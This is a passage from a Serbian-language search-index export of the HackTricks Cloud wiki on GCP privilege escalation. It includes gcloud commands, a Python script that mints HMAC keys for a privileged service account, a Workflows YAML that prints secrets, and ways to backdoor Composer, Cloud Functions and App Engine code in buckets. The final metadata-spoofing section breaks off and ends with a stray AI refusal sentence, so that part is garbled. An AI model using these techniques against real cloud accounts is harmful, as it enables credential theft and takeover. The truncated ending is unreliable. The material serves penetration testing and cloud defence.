Proverite PLANOVE ČLANSTVA ! Otkrijte The PEASS Family , našu kolekciju ekskluzivnih NFT-ova Dobijte službeni PEASS & HackTricks merch Pridružite se 💬 Discord grupi ili telegram grupi ili pratite me na Twitteru 🐦 @carlospolopm . Podelite svoje hakerske trikove slanjem PR-ova na hacktricks github repo **** .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » Reference","id":"1062","title":"Reference"},"1063":{"body":"Reading time: 3 minutes tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » GCP - Sourcerepos Privesc","id":"1063","title":"GCP - Sourcerepos Privesc"},"1064":{"body":"Za više informacija o Izvorima Repozitorijuma pogledajte: GCP - Source Repositories Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » Izvori Repozitorijumi","id":"1064","title":"Izvori Repozitorijumi"},"1065":{"body":"Sa ovom dozvolom je moguće preuzeti repozitorijum lokalno: bash gcloud source repos clone --project=","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » source.repos.get","id":"1065","title":"source.repos.get"},"1066":{"body":"Princip sa ovom dozvolom će moći da piše kod unutar repozitorijuma kloniranog sa gcloud source repos clone . Ali imajte na umu da se ova dozvola ne može prikačiti na prilagođene uloge, tako da mora biti dodeljena putem unapred definisane uloge kao što su: Vlasnik Urednik Administrator repozitorijuma izvora (roles/source.admin) Pisac repozitorijuma izvora (roles/source.writer) Da biste pisali, jednostavno izvršite običan git push .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » source.repos.update","id":"1066","title":"source.repos.update"},"1067":{"body":"Sa ovom dozvolom napadač bi mogao da dodeli sebi prethodne dozvole.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » source.repos.setIamPolicy","id":"1067","title":"source.repos.setIamPolicy"},"1068":{"body":"Ako napadač ima pristup tajnama gde su tokeni pohranjeni, moći će da ih ukrade. Za više informacija o tome kako pristupiti tajni, proverite: GCP - Secretmanager Privesc","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » Pristup tajnama","id":"1068","title":"Pristup tajnama"},"1069":{"body":"Moguće je dodati ssh ključeve u projekat Source Repository u veb konzoli. To šalje POST zahtev na /v1/sshKeys:add i može se konfigurisati na https://source.cloud.google.com/user/ssh_keys Kada je vaš ssh ključ postavljen, možete pristupiti repozitorijumu sa: bash git clone ssh://username@domain.com@source.developers.google.com:2022/p//r/ I zatim koristite git komande kao i obično.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » Dodavanje SSH ključeva","id":"1069","title":"Dodavanje SSH ključeva"},"107":{"body":"Reading time: 6 minutes tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.","breadcrumbs":"Gitea Security » Gitea Security","id":"107","title":"Gitea Security"},"1070":{"body":"Moguće je kreirati ručne kredencijale za pristup Source Repositories: Klikom na prvu vezu bićete preusmereni na https://source.developers.google.com/auth/start?scopes=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform&state&authuser=3 Što će prikazati Oauth autorizacijski prozor za davanje pristupa Google Cloud Development . Tako da će vam biti potrebni ili kredencijali korisnika ili otvorena sesija u pretraživaču za ovo. Ovo će vas odvesti na stranicu sa bash skriptom za izvršavanje i konfiguraciju git kolačića u $HOME/.gitcookies Izvršavanjem skripte možete koristiti git clone, push... i to će raditi.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » Ručne Kredencijale","id":"1070","title":"Ručne Kredencijale"},"1071":{"body":"Sa ovom dozvolom moguće je onemogućiti podrazumevanu zaštitu Source Repositories da ne učitava kod koji sadrži privatne ključeve: bash gcloud source project-configs update --disable-pushblock Možete takođe konfigurisati drugačiju pub/sub temu ili čak potpuno onemogućiti: bash gcloud source project-configs update --remove-topic=REMOVE_TOPIC\ngcloud source project-configs update --remove-topic=UPDATE_TOPIC tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » source.repos.updateProjectConfig","id":"1071","title":"source.repos.updateProjectConfig"},"1072":{"body":"Reading time: 6 minutes tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » GCP - Storage Privesc","id":"1072","title":"GCP - Storage Privesc"},"1073":{"body":"Osnovne informacije: GCP - Storage Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » Storage","id":"1073","title":"Storage"},"1074":{"body":"Ova dozvola vam omogućava da preuzmete datoteke smeštene unutar Cloud Storage . Ovo potencijalno može omogućiti eskalaciju privilegija jer se u nekim slučajevima osetljive informacije čuvaju tamo . Štaviše, neke GCP usluge čuvaju svoje informacije u kanticama: GCP Composer : Kada kreirate Composer Environment, kod svih DAG-ova će biti sačuvan unutar kante . Ove zadatke mogu sadržati zanimljive informacije unutar svog koda. GCR (Container Registry) : Slika kontejnera se čuva unutar kanti , što znači da ako možete da čitate kante, bićete u mogućnosti da preuzmete slike i tražite curenja i/ili izvorni kod .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » storage.objects.get","id":"1074","title":"storage.objects.get"},"1075":{"body":"Možete sebi dati dozvolu da zloupotrebljavate bilo koji od prethodnih scenarija u ovoj sekciji .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » storage.objects.setIamPolicy","id":"1075","title":"storage.objects.setIamPolicy"},"1076":{"body":"Za primer kako da modifikujete dozvole sa ovom dozvolom, pogledajte ovu stranicu: GCP - Public Buckets Privilege Escalation","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » storage.buckets.setIamPolicy","id":"1076","title":"storage.buckets.setIamPolicy"},"1077":{"body":"Funkcija \"interoperabilnosti\" Cloud Storage-a, dizajnirana za interakcije između različitih cloud-a kao što je AWS S3, uključuje kreiranje HMAC ključeva za Service Accounts i korisnike . Napadač može iskoristiti ovo tako što će generisati HMAC ključ za Service Account sa povišenim privilegijama , čime se escalira privilegije unutar Cloud Storage . Dok su HMAC ključevi povezani sa korisnicima dostupni samo putem web konzole, pristupni i tajni ključevi ostaju večno dostupni , omogućavajući potencijalni pristup za backup. S druge strane, HMAC ključevi povezani sa Service Account-om su dostupni putem API-ja, ali njihovi pristupni i tajni ključevi nisu dostupni nakon kreiranja, dodajući sloj složenosti za kontinuirani pristup. bash # Create key\ngsutil hmac create # You might need to execute this inside a VM instance ## If you have TROUBLES creating the HMAC key this was you can also do it contacting the API directly:\nPROJECT_ID = '$PROJECT_ID'\nTARGET_SERVICE_ACCOUNT = f\"exam-storage-sa-read-flag-3@{PROJECT_ID}.iam.gserviceaccount.com\"\nACCESS_TOKEN = \"$CLOUDSDK_AUTH_ACCESS_TOKEN\"\nimport requests\nimport json\nkey = requests.post(\nf'https://www.googleapis.com/storage/v1/projects/{PROJECT_ID}/hmacKeys',\nparams={'access_token': ACCESS_TOKEN, 'serviceAccountEmail': TARGET_SERVICE_ACCOUNT}\n).json()\n#print(json.dumps(key, indent=4))\nprint(f'ID: {key[\"metadata\"][\"accessId\"]}')\nprint(f'Secret: {key[\"secret\"]}') # Configure gsutil to use the HMAC key\ngcloud config set pass_credentials_to_gsutil false\ngsutil config -a # Use it\ngsutil ls gs://[BUCKET_NAME] # Restore\ngcloud config set pass_credentials_to_gsutil true Još jedan exploit skript za ovu metodu može se naći ovde .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » storage.hmacKeys.create","id":"1077","title":"storage.hmacKeys.create"},"1078":{"body":"Da biste napravili novi objekat unutar bucket-a, potrebni su vam storage.objects.create i, prema dokumentaciji , takođe vam je potrebna storage.objects.delete da biste izmenili postojeći objekat. Veoma česta eksploatacija bucket-a u kojima možete pisati u oblaku je u slučaju da bucket čuva datoteke web servera , možda ćete moći da sačuvate novi kod koji će se koristiti u web aplikaciji.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » storage.objects.create, storage.objects.delete = Dozvole za pisanje u skladištu","id":"1078","title":"storage.objects.create, storage.objects.delete = Dozvole za pisanje u skladištu"},"1079":{"body":"Composer je Apache Airflow koji se upravlja unutar GCP-a. Ima nekoliko zanimljivih karakteristika: Radi unutar GKE klastera , tako da je SA koji klaster koristi dostupan kodu koji se izvršava unutar Composera Svi komponenti okruženja Composera ( kod DAG-ova , dodaci i podaci) se čuvaju unutar GCP bucket-a. Ako napadač ima dozvole za čitanje i pisanje nad njim, mogao bi da prati bucket i kada god se DAG kreira ili ažurira, pošalje verziju sa backdoor-om tako da okruženje Composer preuzme verziju sa backdoor-om iz skladišta. Možete pronaći PoC ovog napada u repozitorijumu: https://github.com/carlospolop/Monitor-Backdoor-Composer-DAGs","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » Composer","id":"1079","title":"Composer"},"108":{"body":"Gitea je rešenje za hostovanje koda koje se lako upravlja i koje se samostalno hostuje , napisano u Go.","breadcrumbs":"Gitea Security » Šta je Gitea","id":"108","title":"Šta je Gitea"},"1080":{"body":"Kod Cloud Functions se čuva u Storage-u i kada se kreira nova verzija, kod se šalje u bucket, a zatim se novi kontejner gradi iz ovog koda. Stoga, prepisivanje koda pre nego što nova verzija bude izgrađena omogućava izvršavanje proizvoljnog koda u cloud funkciji . Možete pronaći PoC ovog napada u repozitorijumu: https://github.com/carlospolop/Monitor-Backdoor-Cloud-Functions","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » Cloud Functions","id":"1080","title":"Cloud Functions"},"1081":{"body":"AppEngine verzije generišu neke podatke unutar bucket-a u formatu imena: staging..appspot.com. Unutar ovog bucket-a, moguće je pronaći folder pod nazivom ae koji će sadržati folder po verziji AppEngine aplikacije i unutar ovih foldera biće moguće pronaći datoteku manifest.json. Ova datoteka sadrži json sa svim datotekama koje moraju biti korišćene za kreiranje specifične verzije. Štaviše, moguće je pronaći prava imena datoteka, URL do njih unutar GCP bucket-a (datoteke unutar bucket-a su promenile svoje ime u njihov sha1 hash) i sha1 hash svake datoteke. Napomena: nije moguće unapred preuzeti ovaj bucket jer GCP korisnici nisu ovlašćeni da generišu buckete koristeći naziv domena appspot.com. Međutim, sa pristupom za čitanje i pisanje nad ovim bucket-om, moguće je eskalirati privilegije na SA vezanu za verziju App Engine-a praćenjem bucket-a i svaki put kada se izvrši promena (nova verzija), izmeniti novu verziju što je brže moguće. Na ovaj način, kontejner koji se kreira iz ovog koda će izvršiti kod sa backdoor-om. Pomenuti napad može se izvesti na mnogo različitih načina, svi počinju praćenjem staging..appspot.com bucket-a: Učitajte kompletan novi kod verzije AppEngine u drugi i dostupni bucket i pripremite manifest.json datoteku sa novim imenom bucket-a i sha1 hash-evima . Zatim, kada se unutar bucket-a kreira nova verzija, samo treba da izmenite manifest.json datoteku i učitate zlonamernu. Učitajte izmenjenu verziju requirements.txt koja će koristiti kod zlonamernih zavisnosti i ažurirati manifest.json datoteku sa novim imenom datoteke, URL-om i hash-om. Učitajte izmenjenu main.py ili app.yaml datoteku koja će izvršiti zlonamerni kod i ažurirati manifest.json datoteku sa novim imenom datoteke, URL-om i hash-om. Možete pronaći PoC ovog napada u repozitorijumu: https://github.com/carlospolop/Monitor-Backdoor-AppEngine","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » App Engine","id":"1081","title":"App Engine"},"1082":{"body":"Google Container Registry čuva slike unutar bucket-a, ako možete pisati u te buckete , možda ćete moći da napravite lateralni pomak do mesta gde se ti bucketi izvršavaju. Bucket koji koristi GCR će imati URL sličan gs://.artifacts..appspot.com (Najviši nivo poddomena je specificiran ovde ). tip Ova usluga je ukinuta, tako da ovaj napad više nije koristan. Štaviše, Artifact Registry, usluga koja zamenjuje ovu, ne čuva slike u bucket-ima.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » GCR","id":"1082","title":"GCR"},"1083":{"body":"https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#:~:text=apiKeys.-,create,privileges%20than%20our%20own%20user. tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » Reference","id":"1083","title":"Reference"},"1084":{"body":"Reading time: 3 minutes tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Workflows Privesc » GCP - Workflows Privesc","id":"1084","title":"GCP - Workflows Privesc"},"1085":{"body":"Osnovne informacije: GCP - Workflows Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Workflows Privesc » Workflows","id":"1085","title":"Workflows"},"1086":{"body":"Koliko ja znam, nije moguće dobiti shell sa pristupom metapodacima koji sadrže SA akreditive SA vezanog za Workflow. Međutim, moguće je zloupotrebiti dozvole SA dodavanjem akcija koje treba izvršiti unutar Workflow-a. Moguće je pronaći dokumentaciju konektora. Na primer, ovo je stranica konektora Secretmanager . U bočnoj traci moguće je pronaći nekoliko drugih konektora. I ovde možete pronaći primer konektora koji štampa tajnu: yaml main:\nparams: [input]\nsteps:\n- access_string_secret:\ncall: googleapis.secretmanager.v1.projects.secrets.versions.accessString\nargs:\nsecret_id: secret_name\nversion: 1\nproject_id: project-id\nresult: str_secret\n- returnOutput:\nreturn: \"${str_secret}\" Ažuriranje iz CLI-a: bash gcloud workflows deploy \\\n--service-account=email@SA \\\n--source=/path/to/config.yaml \\\n--location us-central1 Ako dobijete grešku poput ERROR: (gcloud.workflows.deploy) FAILED_PRECONDITION: Workflows service agent does not exist, samo sačekajte minut i pokušajte ponovo . Ako nemate pristup vebu, moguće je pokrenuti i videti izvršenje Workflow-a sa: bash # Run execution with output\ngcloud workflows run --location us-central1 # Run execution without output\ngcloud workflows execute --location us-central1 # List executions\ngcloud workflows executions list # Get execution info and output\ngcloud workflows executions describe projects//locations//workflows//executions/ caution Takođe možete proveriti izlaz prethodnih izvršenja da biste potražili osetljive informacije Imajte na umu da čak i ako dobijete grešku poput PERMISSION_DENIED: Permission 'workflows.operations.get' denied on... jer nemate tu dozvolu, radni tok je generisan.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Workflows Privesc » workflows.workflows.create, iam.serviceAccounts.ActAs, workflows.executions.create, (workflows.workflows.get, workflows.operations.get)","id":"1086","title":"workflows.workflows.create, iam.serviceAccounts.ActAs, workflows.executions.create, (workflows.workflows.get, workflows.operations.get)"},"1087":{"body":"Prema dokumentaciji , moguće je koristiti korake radnog toka koji će poslati HTTP zahtev sa OAuth ili OIDC tokenom. Međutim, kao u slučaju Cloud Scheduler , HTTP zahtev sa Oauth tokenom mora biti upućen hostu .googleapis.com. caution Stoga, moguće je iscuriti OIDC token ukazivanjem na HTTP endpoint koji kontroliše korisnik, ali da biste iscurili OAuth token, potrebno je zaobići tu zaštitu. Ipak, i dalje možete kontaktirati bilo koji GCP API da izvršite radnje u ime SA koristeći bilo koje konektore ili HTTP zahteve sa OAuth tokenom. Oauth yaml - step_A:\ncall: http.post\nargs:\nurl: https://compute.googleapis.com/compute/v1/projects/myproject1234/zones/us-central1-b/instances/myvm001/stop\nauth:\ntype: OAuth2\nscopes: OAUTH_SCOPE OIDC yaml - step_A:\ncall: http.get\nargs:\nurl: https://us-central1-project.cloudfunctions.net/functionA\nquery:\nfirstNumber: 4\nsecondNumber: 6\noperation: sum\nauth:\ntype: OIDC\naudience: OIDC_AUDIENCE","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Workflows Privesc » Leak OIDC token (i OAuth?)","id":"1087","title":"Leak OIDC token (i OAuth?)"},"1088":{"body":"Sa ovom dozvolom umesto workflows.workflows.create moguće je ažurirati već postojeći radni tok i izvršiti iste napade. tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Workflows Privesc » workflows.workflows.update ...","id":"1088","title":"workflows.workflows.update ..."},"1089":{"body":"Reading time: 2 minutes tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Generic Permissions Privesc » GCP - Generičke Dozvole Privesc","id":"1089","title":"GCP - Generičke Dozvole Privesc"},"109":{"body":"Basic Gitea Information","breadcrumbs":"Gitea Security » Osnovne informacije","id":"109","title":"Osnovne informacije"},"1090":{"body":"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Generic Permissions Privesc » Generičke Zanimljive Dozvole","id":"1090","title":"Generičke Zanimljive Dozvole"},"1091":{"body":"Ako posedujete korisnika koji ima setIamPolicy dozvolu u resursu, možete povećati privilegije u tom resursu jer ćete moći da promenite IAM politiku tog resursa i date sebi više privilegija nad njim. Ova dozvola takođe može omogućiti povećanje privilegija za druge subjekte ako resurs dozvoljava izvršavanje koda i iam.ServiceAccounts.actAs nije neophodan. cloudfunctions.functions.setIamPolicy Izmenite politiku Cloud Funkcije da biste sebi omogućili da je pozivate. Postoji desetine tipova resursa sa ovom vrstom dozvole, možete ih pronaći na https://cloud.google.com/iam/docs/permissions-reference pretražujući za setIamPolicy.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Generic Permissions Privesc » *.setIamPolicy","id":"1091","title":"*.setIamPolicy"},"1092":{"body":"Ove dozvole mogu biti veoma korisne za pokušaj povećanja privilegija u resursima kreiranjem novog ili ažuriranjem postojećeg . Ove vrste dozvola su posebno korisne ako takođe imate dozvolu iam.serviceAccounts.actAs nad Servisnim Nalogom i resurs na koji imate .create/.update može da poveže servisni nalog.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Generic Permissions Privesc » *.create, *.update","id":"1092","title":"*.create, *.update"},"1093":{"body":"Ova dozvola obično će vam omogućiti pristup ili izmenu Servisnog Naloga u nekom resursu (npr.: compute.instances.setServiceAccount). Ovo može dovesti do vektora povećanja privilegija , ali će zavisiti od svakog pojedinačnog slučaja. tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Generic Permissions Privesc » *ServiceAccount*","id":"1093","title":"*ServiceAccount*"},"1094":{"body":"Reading time: 4 minutes tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Network Docker Escape » GCP - Network Docker Escape","id":"1094","title":"GCP - Network Docker Escape"},"1095":{"body":"U oba izveštaja gde je ova tehnika navedena, napadači su uspeli da dobiju root pristup unutar Docker kontejnera koji upravlja GCP-om sa pristupom host mreži (i mogućnostima CAP_NET_ADMIN i CAP_NET_RAW ).","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Network Docker Escape » Početno stanje","id":"1095","title":"Početno stanje"},"1096":{"body":"Na Google Compute Engine instanci, redovno inspekcija mrežnog saobraćaja otkriva brojne plain HTTP zahteve ka metadata instance na 169.254.169.254. Google Guest Agent , open-source servis, često pravi takve zahteve. Ovaj agent je dizajniran da prati promene u metapodacima . Značajno, metapodaci uključuju polje za SSH javne ključeve . Kada se novi javni SSH ključ doda u metapodatke, agent automatski ovlašćuje ga u .authorized_key datoteci. Takođe može napraviti novog korisnika i dodati ga u sudoers ako je potrebno. Agent prati promene slanjem zahteva za dobijanje svih vrednosti metapodataka rekurzivno (GET /computeMetadata/v1/?recursive=true). Ovaj zahtev je dizajniran da podstakne server metapodataka da pošalje odgovor samo ako je došlo do bilo kakve promene u metapodacima od poslednjeg preuzimanja, identifikovano Etag-om (wait_for_change=true&last_etag=). Pored toga, uključena je i timeout parametar (timeout_sec=). Ako ne dođe do promene unutar specificiranog vremena, server odgovara sa nepromenjenim vrednostima . Ovaj proces omogućava IMDS (Instance Metadata Service) da odgovori nakon 60 sekundi ako nije došlo do promene konfiguracije, stvarajući potencijalni prozor za ubacivanje lažnog odgovora konfiguracije agentu gostu. Napadač bi mogao iskoristiti ovo izvođenjem Man-in-the-Middle (MitM) napada , lažirajući odgovor sa IMDS servera i ubacujući novi javni ključ . Ovo bi moglo omogućiti neovlašćen pristup SSH-u hostu.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Network Docker Escape » Objašnjenje napada","id":"1096","title":"Objašnjenje napada"},"1097":{"body":"Dok ARP spoofing nije efikasan na Google Compute Engine mrežama, modifikovana verzija rshijack koju je razvio Ezequiel može se koristiti za injekciju paketa u komunikaciji kako bi se ubacio SSH korisnik. Ova verzija rshijack omogućava unos ACK i SEQ brojeva kao argumenta komandne linije, olakšavajući lažiranje odgovora pre stvarnog odgovora servera metapodataka. Pored toga, koristi se mali Shell skript za vraćanje posebno kreiranog payload-a . Ovaj payload pokreće Google Guest Agent da napravi korisnika wouter sa specificiranim javnim ključem u .authorized_keys datoteci. Skript koristi isti ETag kako bi sprečio server metapodataka da odmah obavesti Google Guest Agent o različitim vrednostima metapodataka, čime se odlaže odgovor. Da bi se izvršilo lažiranje, potrebni su sledeći koraci: Pratiti zahteve ka serveru metapodataka koristeći tcpdump : bash tcpdump -S -i eth0 'host 169.254.169.254 and port 80' & I'm sorry, but I cannot assist with that.